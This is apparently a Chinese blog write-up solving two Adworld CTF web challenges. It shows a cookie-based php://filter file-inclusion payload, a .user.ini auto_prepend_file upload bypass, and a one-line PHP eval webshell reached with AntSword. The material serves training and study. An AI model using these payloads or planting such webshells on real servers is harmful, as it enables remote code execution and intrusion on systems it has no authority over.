双剑破天门:攻防世界Web题解之独孤九剑心法(三)

双剑破天门:攻防世界Web题解之独孤九剑心法(三)

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任


**本文以攻防世界部分题为例进行演示,后续会对攻防世界大部分的web题目进行演示,如果你感兴趣请关注**


目录

一:攻防世界web-Fileinclude

二:攻防世界web-Easyupload

三:总结


一:攻防世界web-Fileinclude

打开为如下图所示

Flag在flag.php

我们查看源码发现如下

代码审计如下

<?php // 检查是否开启了错误显示,如果没有,则开启 if( !ini_get('display_errors') ) { ini_set('display_errors', 'On'); } // 设置错误报告级别为显示所有错误 error_reporting(E_ALL); // 从 cookie 中获取语言设置 $lan = $_COOKIE['language']; // 如果 cookie 中没有语言设置 if(!$lan) { // 设置默认语言为 english @setcookie("language","english"); // 包含英文语言文件 @include("english.php"); } else { // 如果有语言设置,包含对应的语言文件 @include($lan.".php"); } // 读取 index.php 文件的内容 $x = file_get_contents('index.php'); // 输出 index.php 文件的内容 echo $x; ?>

所以根据代码审计结果我们得知只有cookie中有相应的语言设置才能得到flag

但是检查发现没有cookie所以我们需要自行利用bp传cookie

构建payload=cookie:language=flag发现页面无输出,所以还是有问题

结合题目fileinclude我们可以试一试php伪协议

Payload:cookie:language=php://filter/read=convert.base64-encode/resource=flag

这里路径为flag而不是flag.php因为根据源代码知$lan=flag 在拼接后面.php才对

成功得到flag


二:攻防世界web-Easyupload

打开为文件上传

我们随便上传一个木马文件发现被干掉所以这里应该是过滤了php

所以我们利用fastcg中.user.ini特性进行任意命令执行

参考文章:.user.ini文件构成的PHP后门 - phith0n

添加如下内容

GIF89a
auto_prepend_file=a.jpg

然后利用bp抓包将这个文件上传记住要将Content-Type: application/octet-stream修改为
Content-Type: image/jpg

上传成功

然后将我们准备好的图片马修改为a.jpg我们试一试图片马看看能不能上传,我们现将php改掉

如果你没有图片马可以自行创建一个内容如下 

GIF89a

<?=eval($_REQUEST[c]);?>

修改后如下

 <?=eval($_REQUEST[cmd]);?>

上传成功,我们利用蚁剑连接

连接成功

成功拿到flag

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。


三:总结

PHP 伪协议是一组用于访问不同类型资源、执行代码等操作的特殊协议,可在文件包含等场景被利用;而 FastCGI 中的.user.ini 特性允许用户在特定目录下配置 PHP 运行时设置,若配置不当可能引发安全风险,被攻击者利用来执行恶意代码。


(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

Read more

GLM-4.6V-Flash-WEB模型参数量大小及内存占用估算

GLM-4.6V-Flash-WEB 模型参数量与内存占用深度解析 在当前多模态AI技术加速落地的背景下,一个核心矛盾日益凸显:大模型能力越强,资源消耗也越高。许多视觉语言模型虽然在学术指标上表现出色,但动辄需要双GPU、数十GB显存和秒级响应时间,难以满足真实业务中对低延迟、高并发、低成本的实际需求。 正是在这样的现实挑战下,智谱AI推出的 GLM-4.6V-Flash-WEB 显得尤为特别。它不追求极致参数规模,而是将“可部署性”作为设计原点——用更少的资源实现足够强的能力,让多模态理解真正走进中小企业、边缘设备甚至Web服务场景。 这款模型的名字本身就透露了它的定位:“4.6V”指向其约46亿参数的体量,“Flash”强调推理速度,“WEB”则明确其轻量化、易集成的应用边界。那么,这个“小而快”的模型究竟如何在性能与效率之间取得平衡?它的实际内存开销是否真的能跑在一张消费级显卡上?我们不妨从最基础但也最关键的两个维度切入:参数量级与显存占用。 根据命名惯例及同类模型对比分析,GLM-4.6V-Flash-WEB 的总参数量大致为 4.6 billion(46亿)。这一体量

Spring Web MVC从入门到实战

Spring Web MVC从入门到实战

—JavaEE专栏— 1. Spring Web MVC核心概念 1.1 什么是Spring Web MVC Spring Web MVC是基于Servlet API构建的原始Web框架,从一开始就包含在Spring框架中,其正式名称来源于源模块名称(spring-webmvc),通常简称为Spring MVC。 官方定义:Spring Web MVC is the original web framework built on the Servlet API and has been included in the Spring Framework from the very beginning. Servlet是Java Web开发的规范,定义了动态页面开发的技术标准,而Tomcat、Weblogic等Servlet容器则是该规范的具体实现,

WebRTC指纹伪装:隐藏本地IP与硬件信息(实战指南)

WebRTC指纹伪装:隐藏本地IP与硬件信息(实战指南)

在浏览器自动化、爬虫或隐私保护场景中,WebRTC(网页实时通信) 是泄露隐私的“重灾区”——它会通过RTCPeerConnection接口主动暴露本地内网IP(如192.168.1.10)、公网IP(绕过代理),甚至间接泄露硬件性能(如CPU核心数、网卡信息),形成唯一的“WebRTC指纹”,被反爬系统、指纹追踪系统精准识别。 本文从工业级实战角度,基于Python(Selenium/Playwright)和浏览器扩展,拆解WebRTC指纹的核心泄露点,实现本地IP完全隐藏、硬件信息随机化的双重伪装。全程聚焦技术原理与合规应用(仅用于隐私保护、合规自动化测试),杜绝恶意攻击与违规追踪规避。 一、核心前提:WebRTC为何会泄露信息? WebRTC的设计初衷是实现浏览器间点对点通信(如视频通话、文件传输),因此需要获取网络地址和硬件能力来建立连接,核心泄露点有3个: 泄露类型核心接口泄露内容风险网络地址RTCPeerConnection()

新手必看!ClaudeCode+Figma-MCP 前端代码 1:1 还原 UI 的入门指南

理解基础概念 ClaudeCode与Figma-MCP结合使用能实现设计稿到代码的高效转换。Figma-MCP是Figma的代码生成插件,ClaudeCode是AI辅助编程工具,两者搭配可自动生成高保真前端代码。 安装必要工具 确保已安装Figma桌面版或网页版,在Figma社区搜索并安装MCP插件。ClaudeCode通常作为VSCode插件或独立应用使用,需在对应平台完成安装和账号绑定。 设计稿准备 在Figma中完成UI设计后,使用图层命名规范。建议采用BEM命名法,如header__button--active。为需要交互的元素添加注释,标注状态变化和动效参数。 使用MCP生成基础代码 选中Figma画板或组件,运行MCP插件。配置输出选项为HTML/CSS或React/Vue等框架代码。检查生成的代码结构,重点关注class命名与设计稿的映射关系。 代码优化流程 将MCP生成的代码导入ClaudeCode进行增强。通过自然语言指令调整代码结构,例如"优化响应式布局"或"添加hover动效"。检查Claude建议的代码修改,重点关注跨浏览器兼容性处理。 //